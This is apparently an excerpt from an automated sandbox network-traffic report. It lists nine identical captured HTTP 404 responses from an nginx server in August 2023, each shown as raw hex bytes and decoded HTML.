                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:17 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
